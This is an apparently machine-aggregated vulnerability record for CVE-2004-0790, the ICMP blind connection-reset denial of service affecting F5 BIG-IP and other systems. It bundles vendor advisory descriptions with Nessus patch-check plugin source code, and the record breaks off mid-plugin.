{"id": "F5:K4583", "type": "f5", "bulletinFamily": "software", "title": "Insufficient validation of ICMP error messages VU#222750 / CVE-2004-0790 (9.x - 10.x)", "description": "", "published": "2007-05-17T04:00:00", "modified": "2018-07-03T23:30:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://support.f5.com/csp/article/K4583", "reporter": "f5", "references": [], "cvelist": ["CVE-2004-0790"], "immutableFields": [], "lastseen": "2020-03-27T02:45:55", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:222750"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2005-356", "CPAI-2013-1688"]}, {"type": "cve", "idList": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"]}, {"type": "exploitdb", "idList": ["EDB-ID:25387", "EDB-ID:25388", "EDB-ID:25389", "EDB-ID:948"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71B747534955EA3973CCD9599C63F9C6", "EXPLOITPACK:CA67AC8E4BC50B223150F812C934C82E", "EXPLOITPACK:E702ACBD662B14AAF4EE4BDC14AB8BA9", "EXPLOITPACK:F18E26220A1C51AD7CB98D811BBAA0E4"]}, {"type": "f5", "idList": ["F5:K23440942", "SOL4583"]}, {"type": "nessus", "idList": ["CISCO-SA-20050412-ICMP.NASL", "F5_BIGIP_SOL23440942.NASL", "F5_BIGIP_SOL4583.NASL", "HPUX_PHNE_25644.NASL", "HPUX_PHNE_26076.NASL", "HPUX_PHNE_26125.NASL", "HPUX_PHNE_32606.NASL", "HPUX_PHNE_33159.NASL", "HPUX_PHNE_33395.NASL", "HPUX_PHNE_33427.NASL", "SMB_KB893066.NASL", "SMB_NT_MS05-019.NASL", "SMB_NT_MS06-064.NASL", "SOLARIS10_118822.NASL", "SOLARIS10_X86_118844.NASL", "SOLARIS7_106541.NASL", "SOLARIS7_X86_106542.NASL", "SOLARIS9_118305.NASL", "SOLARIS9_X86_117470.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902588", "OPENVAS:902588"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10568", "SECURITYVULNS:DOC:14617", "SECURITYVULNS:DOC:8310", "SECURITYVULNS:DOC:9226", "SECURITYVULNS:DOC:9653"]}, {"type": "seebug", "idList": ["SSV:15543", "SSV:63076", "SSV:79050", "SSV:79051", "SSV:79052"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2004-0790"]}]}, "score": {"value": 7.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:222750"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-1688"]}, {"type": "cve", "idList": ["CVE-2004-0790"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71B747534955EA3973CCD9599C63F9C6"]}, {"type": "f5", "idList": ["SOL4583"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL23440942.NASL", "HPUX_PHNE_25644.NASL", "HPUX_PHNE_33159.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:9226"]}, {"type": "seebug", "idList": ["SSV:15543"]}]}, "exploitation": null, "vulnersScore": 7.3}, "affectedSoftware": [{"name": "big-ip ltm", "operator": "le", "version": "9.4.8"}, {"name": "big-ip wan optimization", "operator": "le", "version": "10.2.2"}, {"name": "big-ip webaccelerator", "operator": "le", "version": "10.2.2"}, {"name": "big-ip asm", "operator": "le", "version": "9.4.8"}, {"name": "big-ip asm", "operator": "le", "version": "9.2.5"}, {"name": "big-ip ltm", "operator": "le", "version": "9.0.5"}, {"name": "big-ip webaccelerator", "operator": "le", "version": "9.4.8"}, {"name": "big-ip psm", "operator": "le", "version": "10.2.2"}, {"name": "big-ip psm", "operator": "le", "version": "9.4.8"}, {"name": "big-ip link controller", "operator": "le", "version": "10.2.2"}, {"name": "big-ip ltm", "operator": "le", "version": "10.2.2"}, {"name": "big-ip ltm", "operator": "le", "version": "9.1.3"}, {"name": "big-ip link controller", "operator": "le", "version": "9.2.5"}, {"name": "big-ip link controller", "operator": "le", "version": "9.4.8"}, {"name": "big-ip apm", "operator": "le", "version": "10.2.2"}, {"name": "big-ip edge gateway", "operator": "le", "version": "10.2.2"}, {"name": "big-ip asm", "operator": "le", "version": "10.2.2"}, {"name": "big-ip ltm", "operator": "le", "version": "9.6.1"}, {"name": "big-ip ltm", "operator": "le", "version": "9.2.5"}], "_state": {"dependencies": 1647589307, "score": 0}}

{"ubuntucve": [{"lastseen": "2021-11-22T22:04:30", "description": "Multiple TCP/IP and ICMP implementations allow remote attackers to cause a\ndenial of service (reset TCP connections) via spoofed ICMP error messages,\naka the \"blind connection-reset attack.\" NOTE: CVE-2004-0790,\nCVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different\nattacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are\nrelated identifiers that are SPLIT based on the underlying vulnerability.\nWhile CVE normally SPLITs based on vulnerability, the attack-based\nidentifiers exist due to the variety and number of affected implementations\nand solutions that address the attacks instead of the underlying\nvulnerabilities.", "cvss3": {}, "published": "2005-04-12T00:00:00", "type": "ubuntucve", "title": "CVE-2004-0790", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790"], "modified": "2005-04-12T00:00:00", "id": "UB:CVE-2004-0790", "href": "https://ubuntu.com/security/CVE-2004-0790", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:15:24", "description": "There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can force the vulnerable system to reset TCP connection. A remote attacker can exploit this vulnerability to interrupt services or degrade the network performance of the target system. In order for an attack to be executed there must exist an open TCP connection between a pair of hosts. The attacker then has the option of attacking either one of the two connected hosts. The resulting behavior needs to be explored from both sides of the connection.", "cvss3": {}, "published": "2013-04-30T00:00:00", "type": "checkpoint_advisories", "title": "Multiple Vendor ICMP Connection Reset Denial of Service - High Confidence (CVE-2004-0790)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790"], "modified": "2014-07-29T00:00:00", "id": "CPAI-2013-1688", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-04T20:09:18", "description": "The Internet Control Message Protocol (ICMP) is part of the Internet Protocol suite. ICMP facilitates error, control, and informational message exchange between network devices. For instance, ICMP may be used to test network connectivity between two hosts. There exists a vulnerability in multiple vendor's TCP/IP and Internet Control Message Protocol (ICMP) implementations. A spoofed ICMP message containing crafted fields can force the vulnerable system to reset TCP connection. A remote attacker can exploit this vulnerability to interrupt services or degrade the network performance of the target system. In order for an attack to be executed there must exist an open TCP connection between a pair of hosts. The attacker then has the option of attacking either one of the two connected hosts. The resulting behavior needs to be explored from both sides of the connection. Upon receiving the malicious packet from the attacker the vulnerable host will terminate the TCP connection, thereby destroying the socket used to maintain the connection. No announcement will be sent to the other host, the connected host. Therefore the connected host will remain unaware that the connection has been terminated. If the connected host was in the listening mode at the time of the attack it may remain in this mode indefinitely. Alternatively, if it tries to communicate with the vulnerable host, it will receive a TCP RST, since the vulnerable host has already closed the connection and destroyed the socket. Note: Systems using Sun Solaris will not abort an established connection upon receiving the spoofed ICMP error messages. The vendor reports that only a connection in a pre-established state can be interrupted and reset.", "cvss3": {}, "published": "2010-02-28T00:00:00", "type": "checkpoint_advisories", "title": "Multiple Vendor ICMP Connection Reset Denial of Service (CVE-2004-0790)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790"], "modified": "2013-04-30T00:00:00", "id": "CPAI-2005-356", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-08-19T13:20:05", "description": "SunOS 5.7: Kernel Update Patch.\nDate this patch was last updated by Sun : Dec/06/06", "cvss3": {"score": null, "vector": null}, "published": "2004-07-12T00:00:00", "type": "nessus", "title": "Solaris 7 (sparc) : 106541-44", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791"], "modified": "2011-10-24T00:00:00", "cpe": [], "id": "SOLARIS7_106541.NASL", "href": "https://www.tenable.com/plugins/nessus/13086", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13086);\n script_version(\"1.33\");\n\n script_name(english: \"Solaris 7 (sparc) : 106541-44\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 106541-44\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.7: Kernel Update Patch.\nDate this patch was last updated by Sun : Dec/06/06');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1001318.1.html\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"Date: 2018/07/20 0:18:53\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 106541-44\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\n\n\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"1.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWarcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWatfsr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.7.0,REV=1999.01.11.15.30\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcarx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcarx\", version:\"11.7.0,REV=1998.11.30.15.02\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.7.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcprx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcprx\", version:\"11.7.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcslx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.7.0,REV=1998.10.06.00.59\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcsxu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcvc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWcvcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdpl\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdplx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdrr\", version:\"11.7.0,REV=1999.03.09.04.51\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWdrrx\", version:\"11.7.0,REV=1999.03.09.04.51\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWesu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWesxu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWipc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.7.0,REV=1999.01.11.15.30\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvmx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWkvmx\", version:\"11.7.0,REV=1998.11.16.20.05\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWnisu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWpcmci\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWpcmcu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWpcmcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWscpu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWscpux\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWssadx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWsxr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtnfc\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtnfcx\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWtoox\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWvolr\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWvolu\", version:\"11.7.0,REV=1998.09.01.04.16\");\ne += solaris_check_patch(release:\"5.7\", arch:\"sparc\", patch:\"106541-44\", obsoleted_by:\"\", package:\"SUNWypu\", version:\"11.7.0,REV=1998.09.01.04.16\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T13:20:06", "description": "SunOS 5.7_x86: Kernel Update Patch.\nDate this patch was last updated by Sun : Nov/27/06", "cvss3": {"score": null, "vector": null}, "published": "2004-07-12T00:00:00", "type": "nessus", "title": "Solaris 7 (x86) : 106542-43", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791"], "modified": "2011-10-24T00:00:00", "cpe": [], "id": "SOLARIS7_X86_106542.NASL", "href": "https://www.tenable.com/plugins/nessus/13193", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13193);\n script_version(\"1.29\");\n\n script_name(english: \"Solaris 7 (x86) : 106542-43\");\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 106542-43\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.7_x86: Kernel Update Patch.\nDate this patch was last updated by Sun : Nov/27/06');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1001318.1.html\");\n script_set_attribute(attribute: \"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/12\");\n script_cvs_date(\"Date: 2018/07/20 0:18:53\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 106542-43\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\n\n\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWatfsr\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.7.0,REV=1998.10.06.01.22\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWdpl\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWesu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWipc\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWnisu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWpcmci\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWpcmcu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWscpu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWtnfc\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWvolr\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWvolu\", version:\"11.7.0,REV=1998.09.01.04.53\");\ne += solaris_check_patch(release:\"5.7_x86\", arch:\"i386\", patch:\"106542-43\", obsoleted_by:\"\", package:\"SUNWypu\", version:\"11.7.0,REV=1998.09.01.04.53\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_warning(0);\n\telse \n\t security_warning(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:44:26", "description": "The remote BIG-IP device is missing a patch required by a security advisory.", "cvss3": {"score": null, "vector": null}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Insufficient validation of ICMP error messages (SOL4583)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL4583.NASL", "href": "https://www.tenable.com/plugins/nessus/86016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL4583.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86016);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\");\n script_bugtraq_id(13124);\n\n script_name(english:\"F5 Networks BIG-IP : Insufficient validation of ICMP error messages (SOL4583)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K4583\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL4583.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", 